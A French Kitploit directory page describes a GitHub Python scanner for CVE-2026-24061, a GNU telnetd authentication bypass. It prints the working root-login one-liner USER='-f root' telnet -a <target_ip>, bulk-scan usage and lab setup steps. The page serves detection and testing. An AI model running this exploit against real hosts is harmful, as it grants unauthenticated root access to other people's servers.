Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/monstertsl/cve-2026-24061
Scanners de VulnérabilitésExploitationTests d'IntrusionAuthentificationOutil d'Accès à Distance
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Scanner basé sur Python qui détecte la CVE-2026-24061 dans GNU Inetutils telnetd, permettant de tester en lot plusieurs cibles pour la vulnérabilité de contournement d'authentification.

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil de détection en masse de la vulnérabilité CVE-2026-24061

⚠️ Remarque : CVE-2026-24061 GNU Inetutils est un ensemble d'outils réseau classiques fourni par le projet GNU, qui inclut le service telnetd, c'est-à-dire le démon serveur Telnet. Dans les versions 1.9.3 à 2.7, le service telnetd présente un défaut critique dans le processus d'authentification des utilisateurs. Lorsque ce service appelle le programme de connexion système /usr/bin/login, il ne filtre ni ne valide correctement la variable d'environnement USER transmise par le client. Un attaquant peut, en définissant une valeur spécifique pour la variable USER, injecter directement le paramètre -f dans la commande login. Le paramètre -f du programme login sert à « contourner la double authentification », ce qui permet à l'attaquant de contourner entièrement toutes les étapes de vérification du mot de passe et d'établir directement une session distante en tant qu'utilisateur root, obtenant ainsi le plus haut niveau de contrôle sur le serveur. Cette vulnérabilité est extrêmement dangereuse, équivalant à une porte dérobée root distante publique, ne nécessitant aucune information d'identification.

POC de détection de la vulnérabilité

root@kitploit:~
USER='-f root' telnet -a <target_ip>

Script de détection

demo.png

Détection individuelle

root@kitploit:~
python3 cve-2026-24061.py -i 10.10.168.128

Détection en masse

root@kitploit:~
python3 cve-2026-24061.py -f targets.txt

Principe de la vulnérabilité

La commande ci-dessus définit la variable d'environnement USER sur -f root. Lorsque le service telnetd vulnérable reçoit une connexion, il construit et exécute un appel système similaire à celui-ci :

Étapes de reproduction

1. Installer les programmes nécessaires

root@kitploit:~
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. Décommenter la ligne telnet (s'assurer que le format est correct)

root@kitploit:~
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. Redémarrer le service

root@kitploit:~
sudo systemctl restart openbsd-inetd

4. Vérifier le port

root@kitploit:~
sudo ss -tuln | grep ':23'

5. Test local

root@kitploit:~
telnet localhost 23
Télécharger l’outil